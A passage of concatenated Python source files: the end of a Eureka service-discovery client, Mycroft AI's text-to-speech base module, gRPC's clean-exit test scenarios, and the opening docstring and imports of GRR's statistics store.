existingApp.update_instance(instance)
elif instance.actionType == ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.remove_instance(instance)
def __get_applications_hash(self):
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
if instance.status.upper() not in app_status_count:
app_status_count[instance.status.upper()] = 0
app_status_count[instance.status.upper()] += 1
sorted_app_status_count = sorted(app_status_count.items(), key=lambda item: item[0])
for item in sorted_app_status_count:
app_hash = app_hash + "%s_%d_" % (item[0], item[1])
return app_hash
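# Example (illustrative): with 3 UP instances and 1 DOWN instance the loop
# above produces "DOWN_1_UP_3_", which is compared against the server's
# apps__hashcode.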
def walk_nodes_async(self, app_name="", service="", prefer_ip=False, prefer_https=False, walker=None, on_success=None, on_error=None):
def async_thread_target():
try:
res = self.walk_nodes(app_name=app_name, service=service, prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(self, app_name="", service="", prefer_ip=False, prefer_https=False, walker=None):
assert app_name is not None and app_name != "", "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(walker), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("service url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn("do service %s in node [%s] error, use next node." % (service, node.instanceId))
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Try all up instances in registry, but all fail")
def do_service_async(self, app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
on_success=None, on_error=None,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
def async_thread_target():
try:
res = self.do_service(app_name=app_name,
service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def do_service(self, app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
def walk_using_urllib(url):
req = http_client.Request(url)
req.get_method = lambda: method
heads = headers if headers is not None else {}
for k, v in heads.items():
req.add_header(k, v)
res_txt = http_client.load(req, data=data, timeout=timeout, cafile=cafile, capath=capath, cadefault=cadefault, context=context)
if return_type.lower() in ("json", "dict", "dictionary"):
return json.loads(res_txt)
else:
return res_txt
return self.walk_nodes(app_name, service, prefer_ip, prefer_https, walk_using_urllib)
def __get_available_service(self, application_name, ignore_instance_ids=None):
app = self.applications.get_application(application_name)
if app is None:
return None
up_instances = []
if ignore_instance_ids is None or len(ignore_instance_ids) == 0:
up_instances.extend(app.up_instances)
else:
for ins in app.up_instances:
if ins.instanceId not in ignore_instance_ids:
up_instances.append(ins)
if len(up_instances) == 0:
# no up instances
return None
elif len(up_instances) == 1:
# only one available instance, so the strategy doesn't matter.
instance = up_instances[0]
self.__ha_cache[application_name] = instance.instanceId
return instance
def random_one(instances):
if len(instances) == 1:
idx = 0
else:
idx = random.randint(0, len(instances) - 1)
selected_instance = instances[idx]
self.__ha_cache[application_name] = selected_instance.instanceId
return selected_instance
if self.__ha_strategy == HA_STRATEGY_RANDOM:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_STICK:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
cache_instance = app.get_instance(cache_id)
if cache_instance is not None and cache_instance.status == INSTANCE_STATUS_UP:
return cache_instance
else:
return random_one(up_instances)
else:
return random_one(up_instances)
elif self.__ha_strategy == HA_STRATEGY_OTHER:
if application_name in self.__ha_cache:
cache_id = self.__ha_cache[application_name]
other_instances = []
for up_instance in up_instances:
if up_instance.instanceId != cache_id:
other_instances.append(up_instance)
return random_one(other_instances)
else:
return random_one(up_instances)
else:
return None
def __generate_service_url(self, instance, prefer_ip, prefer_https):
if instance is None:
return None
schema = "http"
port = 0
if instance.port.port and not instance.securePort.enabled:
schema = "http"
port = instance.port.port
elif not instance.port.port and instance.securePort.enabled:
schema = "https"
port = instance.securePort.port
elif instance.port.port and instance.securePort.enabled:
if prefer_https:
schema = "https"
port = instance.securePort.port
else:
schema = "http"
port = instance.port.port
else:
assert False, "generate_service_url error: No port is available"
host = instance.ipAddr if prefer_ip else instance.hostName
return "%s://%s:%d/" % (schema, host, port)
def start(self):
self.__pull_full_registry()
self.__timer.start()
def stop(self):
if self.__timer.is_alive():
self.__timer.cancel()
__cache_discovery_clients = {}
__cache_discovery_clients_lock = RLock()
def init_discovery_client(eureka_server=_DEFAULT_EUREKA_SERVER_URL, regions=[], renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS, ha_strategy=HA_STRATEGY_RANDOM):
with __cache_discovery_clients_lock:
assert __cache_key not in __cache_discovery_clients, "Client has already been initialized."
cli = DiscoveryClient(eureka_server, regions=regions, renewal_interval_in_secs=renewal_interval_in_secs, ha_strategy=ha_strategy)
cli.start()
__cache_discovery_clients[__cache_key] = cli
return cli
def get_discovery_client():
# type: () -> DiscoveryClient
with __cache_discovery_clients_lock:
if __cache_key in __cache_discovery_clients:
return __cache_discovery_clients[__cache_key]
else:
return None
def init(eureka_server=_DEFAULT_EUREKA_SERVER_URL,
regions=[],
app_name="",
instance_id="",
instance_host="",
instance_ip="",
instance_port=_DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled=True,
instance_secure_port=_DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled=False,
countryId=1, # @deprecated
data_center_name=_DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs=_RENEWAL_INTERVAL_IN_SECS,
duration_in_secs=_DURATION_IN_SECS,
home_page_url="",
status_page_url="",
health_check_url="",
secure_health_check_url="",
vip_adr="",
secure_vip_addr="",
is_coordinating_discovery_server=False,
metadata={},
ha_strategy=HA_STRATEGY_RANDOM):
registry_client = init_registry_client(eureka_server=eureka_server,
app_name=app_name,
instance_id=instance_id,
instance_host=instance_host,
instance_ip=instance_ip,
instance_port=instance_port,
instance_unsecure_port_enabled=instance_unsecure_port_enabled,
instance_secure_port=instance_secure_port,
instance_secure_port_enabled=instance_secure_port_enabled,
countryId=countryId,
data_center_name=data_center_name,
renewal_interval_in_secs=renewal_interval_in_secs,
duration_in_secs=duration_in_secs,
home_page_url=home_page_url,
status_page_url=status_page_url,
health_check_url=health_check_url,
secure_health_check_url=secure_health_check_url,
vip_adr=vip_adr,
secure_vip_addr=secure_vip_addr,
is_coordinating_discovery_server=is_coordinating_discovery_server,
metadata=metadata)
discovery_client = init_discovery_client(eureka_server,
regions=regions,
renewal_interval_in_secs=renewal_interval_in_secs,
ha_strategy=ha_strategy)
return registry_client, discovery_client
def walk_nodes_async(app_name="", service="", prefer_ip=False, prefer_https=False, walker=None, on_success=None, on_error=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.walk_nodes_async(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https,
walker=walker, on_success=on_success, on_error=on_error)
def walk_nodes(app_name="", service="", prefer_ip=False, prefer_https=False, walker=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.walk_nodes(app_name=app_name, service=service,
prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
def do_service_async(app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
on_success=None, on_error=None,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
cli.do_service_async(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
on_success=on_success, on_error=on_error,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def do_service(app_name="", service="", return_type="string",
prefer_ip=False, prefer_https=False,
method="GET", headers=None,
data=None, timeout=_DEFAULT_TIME_OUT,
cafile=None, capath=None, cadefault=False, context=None):
cli = get_discovery_client()
if cli is None:
raise Exception("Discovery Client has not initialized. ")
return cli.do_service(app_name=app_name, service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
cadefault=cadefault, context=context)
def stop():
register_cli = get_registry_client()
if register_cli is not None:
register_cli.stop()
discovery_client = get_discovery_client()
if discovery_client is not None:
discovery_client.stop()
@atexit.register
def _cleanup_before_exit():
if len(__cache_registry_clients) > 0:
_logger.debug("cleaning up registry clients")
for k, cli in __cache_registry_clients.items():
_logger.debug("try to stop cache registry client [%s] this will also unregister this client from the eureka server" % k)
cli.stop()
if len(__cache_discovery_clients) > 0:
_logger.debug("cleaning up discovery clients")
for k, cli in __cache_discovery_clients.items():
_logger.debug("try to stop cache discovery client [%s] this will also unregister this client from the eureka server" % k)
cli.stop()
|
__init__.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import hashlib
import os
import random
import re
import sys
from abc import ABCMeta, abstractmethod
from threading import Thread
from time import time, sleep
import os.path
from os.path import dirname, exists, isdir, join
import mycroft.util
from mycroft.enclosure.api import EnclosureAPI
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.metrics import report_timing, Stopwatch
from mycroft.util import (
play_wav, play_mp3, check_for_signal, create_signal, resolve_resource_file
)
from mycroft.util.log import LOG
from queue import Queue, Empty
def send_playback_metric(stopwatch, ident):
"""
Send playback metrics in a background thread
"""
def do_send(stopwatch, ident):
report_timing(ident, 'speech_playback', stopwatch)
t = Thread(target=do_send, args=(stopwatch, ident))
t.daemon = True
t.start()
class PlaybackThread(Thread):
"""
Thread class for playing back tts audio and sending
viseme data to enclosure.
"""
def __init__(self, queue):
super(PlaybackThread, self).__init__()
self.queue = queue
self._terminated = False
self._processing_queue = False
def init(self, tts):
self.tts = tts
def clear_queue(self):
"""
Remove all pending playbacks.
"""
while not self.queue.empty():
self.queue.get()
try:
self.p.terminate()
except Exception:
pass
def run(self):
"""
Thread main loop. get audio and viseme data from queue
and play.
"""
while not self._terminated:
try:
snd_type, data, visemes, ident = self.queue.get(timeout=2)
self.blink(0.5)
if not self._processing_queue:
self._processing_queue = True
self.tts.begin_audio()
stopwatch = Stopwatch()
with stopwatch:
if snd_type == 'wav':
self.p = play_wav(data)
elif snd_type == 'mp3':
self.p = play_mp3(data)
if visemes:
self.show_visemes(visemes)
self.p.communicate()
self.p.wait()
send_playback_metric(stopwatch, ident)
if self.queue.empty():
self.tts.end_audio()
self._processing_queue = False
self.blink(0.2)
except Empty:
pass
except Exception as e:
LOG.exception(e)
if self._processing_queue:
self.tts.end_audio()
self._processing_queue = False
def show_visemes(self, pairs):
"""
Send viseme data to the enclosure.
Args:
pairs (list): viseme and timing pairs
"""
if self.enclosure:
self.enclosure.mouth_viseme(time(), pairs)
def clear(self):
""" Clear all pending actions for the TTS playback thread. """
self.clear_queue()
def blink(self, rate=1.0):
""" Blink mycroft's eyes """
if self.enclosure and random.random() < rate:
self.enclosure.eyes_blink("b")
def stop(self):
""" Stop thread """
self._terminated = True
self.clear_queue()
class TTS:
"""
TTS abstract class to be implemented by all TTS engines.
It aggregates the minimum required parameters and exposes
``execute(sentence)`` and ``validate_ssml(sentence)`` functions.
Args:
lang (str):
config (dict): Configuration for this specific tts engine
validator (TTSValidator): Used to verify proper installation
phonetic_spelling (bool): Whether to spell certain words phonetically
ssml_tags (list): Supported ssml properties. Ex. ['speak', 'prosody']
"""
__metaclass__ = ABCMeta
def __init__(self, lang, config, validator, audio_ext='wav',
phonetic_spelling=True, ssml_tags=None):
super(TTS, self).__init__()
self.bus = None # initialized in the "init" step
self.lang = lang or 'en-us'
self.config = config
self.validator = validator
self.phonetic_spelling = phonetic_spelling
self.audio_ext = audio_ext
self.ssml_tags = ssml_tags or []
self.voice = config.get("voice")
self.filename = '/tmp/tts.wav'
self.enclosure = None
random.seed()
self.queue = Queue()
self.playback = PlaybackThread(self.queue)
self.playback.start()
self.clear_cache()
self.spellings = self.load_spellings()
self.tts_name = type(self).__name__
def load_spellings(self):
"""Load phonetic spellings of words as dictionary"""
path = join('text', self.lang, 'phonetic_spellings.txt')
spellings_file = resolve_resource_file(path)
if not spellings_file:
return {}
try:
with open(spellings_file) as f:
lines = filter(bool, f.read().split('\n'))
lines = [i.split(':') for i in lines]
return {key.strip(): value.strip() for key, value in lines}
except ValueError:
LOG.exception('Failed to load phonetic spellings.')
return {}
def begin_audio(self):
"""Helper function for child classes to call in execute()"""
# Create signals informing start of speech
self.bus.emit(Message("recognizer_loop:audio_output_start"))
def end_audio(self):
"""
Helper function for child classes to call in execute().
Sends the recognizer_loop:audio_output_end message, indicating
that speaking is done for the moment. It also checks if cache
directory needs cleaning to free up disk space.
"""
self.bus.emit(Message("recognizer_loop:audio_output_end"))
# Clean the cache as needed
cache_dir = mycroft.util.get_cache_directory("tts/" + self.tts_name)
mycroft.util.curate_cache(cache_dir, min_free_percent=100)
# This check will clear the "signal"
check_for_signal("isSpeaking")
def init(self, bus):
""" Performs intial setup of TTS object.
Arguments:
bus: Mycroft messagebus connection
"""
self.bus = bus
self.playback.init(self)
self.enclosure = EnclosureAPI(self.bus)
self.playback.enclosure = self.enclosure
def get_tts(self, sentence, wav_file):
"""
Abstract method that a tts implementation needs to implement.
Should get data from tts.
Args:
sentence(str): Sentence to synthesize
wav_file(str): output file
Returns:
tuple: (wav_file, phoneme)
"""
pass
def modify_tag(self, tag):
"""Override to modify each supported ssml tag"""
return tag
@staticmethod
def remove_ssml(text):
return re.sub('<[^>]*>', '', text).replace('  ', ' ')
def validate_ssml(self, utterance):
"""
Check if engine supports ssml, if not remove all tags
Remove unsupported / invalid tags
Args:
utterance(str): Sentence to validate
Returns: validated_sentence (str)
"""
# if ssml is not supported by TTS engine remove all tags
if not self.ssml_tags:
return self.remove_ssml(utterance)
# find ssml tags in string
tags = re.findall('<[^>]*>', utterance)
for tag in tags:
if any(supported in tag for supported in self.ssml_tags):
utterance = utterance.replace(tag, self.modify_tag(tag))
else:
# remove unsupported tag
utterance = utterance.replace(tag, "")
# return text with supported ssml tags only
return utterance.replace("  ", " ")
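# Example (illustrative): with ssml_tags = ['speak', 'prosody'], the input
# '<speak>Hi <unknown>there</unknown></speak>' validates to
# '<speak>Hi there</speak>'; when ssml_tags is empty every tag is stripped.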
def _preprocess_sentence(self, sentence):
""" Default preprocessing is no preprocessing.
This method can be overridden to create chunks suitable to the
TTS engine in question.
Arguments:
sentence (str): sentence to preprocess
Returns:
list: list of sentence parts
"""
return [sentence]
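# Subclasses may override _preprocess_sentence to chunk long inputs for the
# engine; a minimal sketch (hypothetical, splitting on sentence-ending
# punctuation):
#   def _preprocess_sentence(self, sentence):
#       return [s for s in re.split(r'(?<=[.!?])\s+', sentence) if s]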
def execute(self, sentence, ident=None):
"""
Convert sentence to speech, preprocessing out unsupported ssml
The method caches results if possible using the hash of the
sentence.
Args:
sentence: Sentence to be spoken
ident: Id reference to current interaction
"""
sentence = self.validate_ssml(sentence)
create_signal("isSpeaking")
if self.phonetic_spelling:
for word in re.findall(r"[\w']+", sentence):
if word.lower() in self.spellings:
sentence = sentence.replace(word,
self.spellings[word.lower()])
chunks = self._preprocess_sentence(sentence)
for sentence in chunks:
key = str(hashlib.md5(
sentence.encode('utf-8', 'ignore')).hexdigest())
wav_file = os.path.join(
mycroft.util.get_cache_directory("tts/" + self.tts_name),
key + '.' + self.audio_ext)
if os.path.exists(wav_file):
LOG.debug("TTS cache hit")
phonemes = self.load_phonemes(key)
else:
wav_file, phonemes = self.get_tts(sentence, wav_file)
if phonemes:
self.save_phonemes(key, phonemes)
vis = self.viseme(phonemes)
self.queue.put((self.audio_ext, wav_file, vis, ident))
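# Cache layout (derived from the code above): each chunk is keyed by the md5
# hex digest of its text and stored as <cache_dir>/<md5>.<audio_ext>, with a
# matching <md5>.pho file when phonemes are available.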
def viseme(self, phonemes):
"""
Create visemes from phonemes. Needs to be implemented by each
tts backend.
Args:
phonemes(str): String with phoneme data
"""
return None
def clear_cache(self):
""" Remove all cached files. """
if not os.path.exists(mycroft.util.get_cache_directory('tts')):
return
for d in os.listdir(mycroft.util.get_cache_directory("tts")):
dir_path = os.path.join(mycroft.util.get_cache_directory("tts"), d)
if os.path.isdir(dir_path):
for f in os.listdir(dir_path):
file_path = os.path.join(dir_path, f)
if os.path.isfile(file_path):
os.unlink(file_path)
# If no sub-folders are present, check if it is a file & clear it
elif os.path.isfile(dir_path):
os.unlink(dir_path)
def save_phonemes(self, key, phonemes):
"""
Cache phonemes
Args:
key: Hash key for the sentence
phonemes: phoneme string to save
"""
cache_dir = mycroft.util.get_cache_directory("tts/" + self.tts_name)
pho_file = os.path.join(cache_dir, key + ".pho")
try:
with open(pho_file, "w") as cachefile:
cachefile.write(phonemes)
except Exception:
LOG.exception("Failed to write {} to cache".format(pho_file))
pass
def load_phonemes(self, key):
"""
Load phonemes from cache file.
Args:
key: Key identifying the phoneme cache
"""
pho_file = os.path.join(
mycroft.util.get_cache_directory("tts/" + self.tts_name),
key + ".pho")
if os.path.exists(pho_file):
try:
with open(pho_file, "r") as cachefile:
phonemes = cachefile.read().strip()
return phonemes
except Exception:
LOG.debug("Failed to read .PHO from cache")
return None
def __del__(self):
self.playback.stop()
self.playback.join()
class TTSValidator:
"""
TTS Validator abstract class to be implemented by all TTS engines.
It exposes and implements ``validate(tts)`` function as a template to
validate the TTS engines.
"""
__metaclass__ = ABCMeta
def __init__(self, tts):
self.tts = tts
def validate(self):
self.validate_dependencies()
self.validate_instance()
self.validate_filename()
self.validate_lang()
self.validate_connection()
def validate_dependencies(self):
pass
def validate_instance(self):
clazz = self.get_tts_class()
if not isinstance(self.tts, clazz):
raise AttributeError('tts must be instance of ' + clazz.__name__)
def validate_filename(self):
filename = self.tts.filename
if not (filename and filename.endswith('.wav')):
raise AttributeError('file: %s must be in .wav format!' % filename)
dir_path = dirname(filename)
if not (exists(dir_path) and isdir(dir_path)):
raise AttributeError('filename: %s is not valid!' % filename)
@abstractmethod
def validate_lang(self):
pass
@abstractmethod
def validate_connection(self):
pass
@abstractmethod
def get_tts_class(self):
pass
class TTSFactory:
from mycroft.tts.espeak_tts import ESpeak
from mycroft.tts.fa_tts import FATTS
from mycroft.tts.google_tts import GoogleTTS
from mycroft.tts.mary_tts import MaryTTS
from mycroft.tts.mimic_tts import Mimic
from mycroft.tts.spdsay_tts import SpdSay
from mycroft.tts.bing_tts import BingTTS
from mycroft.tts.ibm_tts import WatsonTTS
from mycroft.tts.responsive_voice_tts import ResponsiveVoice
from mycroft.tts.mimic2_tts import Mimic2
CLASSES = {
"mimic": Mimic,
"mimic2": Mimic2,
"google": GoogleTTS,
"marytts": MaryTTS,
"fatts": FATTS,
"espeak": ESpeak,
"spdsay": SpdSay,
"watson": WatsonTTS,
"bing": BingTTS,
"responsive_voice": ResponsiveVoice
}
@staticmethod
def create():
"""
Factory method to create a TTS engine based on configuration.
The configuration file ``mycroft.conf`` contains a ``tts`` section with
the name of a TTS module to be read by this method.
"tts": {
"module": <engine_name>
}
"""
config = Configuration.get()
lang = config.get("lang", "en-us")
tts_module = config.get('tts', {}).get('module', 'mimic')
tts_config = config.get('tts', {}).get(tts_module, {})
tts_lang = tts_config.get('lang', lang)
clazz = TTSFactory.CLASSES.get(tts_module)
tts = clazz(tts_lang, tts_config)
tts.validator.validate()
return tts
|
_exit_scenarios.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a number of module-scope gRPC scenarios to test clean exit."""
import argparse
import threading
import time
import logging
import grpc
from tests.unit.framework.common import test_constants
WAIT_TIME = 1000
REQUEST = b'request'
UNSTARTED_SERVER = 'unstarted_server'
RUNNING_SERVER = 'running_server'
POLL_CONNECTIVITY_NO_SERVER = 'poll_connectivity_no_server'
POLL_CONNECTIVITY = 'poll_connectivity'
IN_FLIGHT_UNARY_UNARY_CALL = 'in_flight_unary_unary_call'
IN_FLIGHT_UNARY_STREAM_CALL = 'in_flight_unary_stream_call'
IN_FLIGHT_STREAM_UNARY_CALL = 'in_flight_stream_unary_call'
IN_FLIGHT_STREAM_STREAM_CALL = 'in_flight_stream_stream_call'
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL = 'in_flight_partial_unary_stream_call'
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL = 'in_flight_partial_stream_unary_call'
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL = 'in_flight_partial_stream_stream_call'
UNARY_UNARY = b'/test/UnaryUnary'
UNARY_STREAM = b'/test/UnaryStream'
STREAM_UNARY = b'/test/StreamUnary'
STREAM_STREAM = b'/test/StreamStream'
PARTIAL_UNARY_STREAM = b'/test/PartialUnaryStream'
PARTIAL_STREAM_UNARY = b'/test/PartialStreamUnary'
PARTIAL_STREAM_STREAM = b'/test/PartialStreamStream'
TEST_TO_METHOD = {
IN_FLIGHT_UNARY_UNARY_CALL: UNARY_UNARY,
IN_FLIGHT_UNARY_STREAM_CALL: UNARY_STREAM,
IN_FLIGHT_STREAM_UNARY_CALL: STREAM_UNARY,
IN_FLIGHT_STREAM_STREAM_CALL: STREAM_STREAM,
IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL: PARTIAL_UNARY_STREAM,
IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL: PARTIAL_STREAM_UNARY,
IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL: PARTIAL_STREAM_STREAM,
}
def hang_unary_unary(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_unary_stream(request, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield request
time.sleep(WAIT_TIME)
def hang_stream_unary(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_unary(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
next(request_iterator)
time.sleep(WAIT_TIME)
def hang_stream_stream(request_iterator, servicer_context):
time.sleep(WAIT_TIME)
def hang_partial_stream_stream(request_iterator, servicer_context):
for _ in range(test_constants.STREAM_LENGTH // 2):
yield next(request_iterator) #pylint: disable=stop-iteration-return
time.sleep(WAIT_TIME)
class MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming, partial_hang):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
if partial_hang:
self.stream_stream = hang_partial_stream_stream
else:
self.stream_stream = hang_stream_stream
elif self.request_streaming:
if partial_hang:
self.stream_unary = hang_partial_stream_unary
else:
self.stream_unary = hang_stream_unary
elif self.response_streaming:
if partial_hang:
self.unary_stream = hang_partial_unary_stream
else:
self.unary_stream = hang_unary_stream
else:
self.unary_unary = hang_unary_unary
class GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == UNARY_UNARY:
return MethodHandler(False, False, False)
elif handler_call_details.method == UNARY_STREAM:
return MethodHandler(False, True, False)
elif handler_call_details.method == STREAM_UNARY:
return MethodHandler(True, False, False)
elif handler_call_details.method == STREAM_STREAM:
return MethodHandler(True, True, False)
elif handler_call_details.method == PARTIAL_UNARY_STREAM:
return MethodHandler(False, True, True)
elif handler_call_details.method == PARTIAL_STREAM_UNARY:
return MethodHandler(True, False, True)
elif handler_call_details.method == PARTIAL_STREAM_STREAM:
return MethodHandler(True, True, True)
else:
return None
# Traditional executors will not exit until all their
# current jobs complete. Because we submit jobs that will
# never finish, we don't want to block exit on these jobs.
class DaemonPool(object):
def submit(self, fn, *args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
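# Usage sketch (illustrative): pass DaemonPool() wherever grpc.server expects
# a futures-style executor, as done in the scenarios below, e.g.
#   server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))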
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument(
'--wait_for_interrupt', dest='wait_for_interrupt', action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
iter([REQUEST] * test_constants.STREAM_LENGTH))
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
|
stats_store.py
|
#!/usr/bin/env python
"""Storage implementation for gathered statistics.
Statistics collected by StatsCollector (see lib/stats.py) are stored in AFF4
space. Statistics data for different parts of the system are separated by
process ids. For example, for the frontend the process id may be "frontend",
for a worker - "worker", etc.
In AFF4, statistics data are stored under aff4:/stats_store.
aff4:/stats_store itself is a URN of a StatsStore object that can be used
for querying stored data and saving new stats.
For every process id, aff4:/stats_store/<process id> object of type
StatsStoreProcessData is created. This object stores metadata of all
the metrics in the METRICS_METADATA field. All the collected statistics
data are written as aff4:stats_store/<metric name> attributes to the
aff4:/stats_store/<process id> row. This way we can easily and efficiently
query statistics data for a given set of metrics for a given process id
for a given time range.
Metrics metadata are stored separately from the values themselves for
efficiency reasons. Metadata objects are created when metrics are registered.
They carry extensive information about the metrics, like metric name and
docstring, metric type, etc. This information does not change (unless GRR's
source code changes), so it doesn't make sense to duplicate it
every time we write a new set of statistics data to the datastore. Therefore
metadata for all the metrics is stored in
StatsStoreProcessData.METRICS_METADATA. Metrics' values themselves are
stored as datastore row attributes.
Statistics is written to the data store by StatsStoreWorker. It periodically
fetches values for all the metrics and writes them to corresponding
object on AFF4.
"""
import logging
import re
import threading
import time
from grr import config
from grr.lib import rdfvalue
from grr.lib import registry
from grr.lib import stats
from grr.server.grr_response_server import access_control
from grr.server.grr_response_server import aff4
from grr.server.grr_response_server import data_store
from grr.server.grr_response_server import stats_values
from grr.server.grr_response_server import timeseries
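# Usage sketch (the process id "worker" and the token handling here are
# illustrative only, not part of this module's API surface):
#
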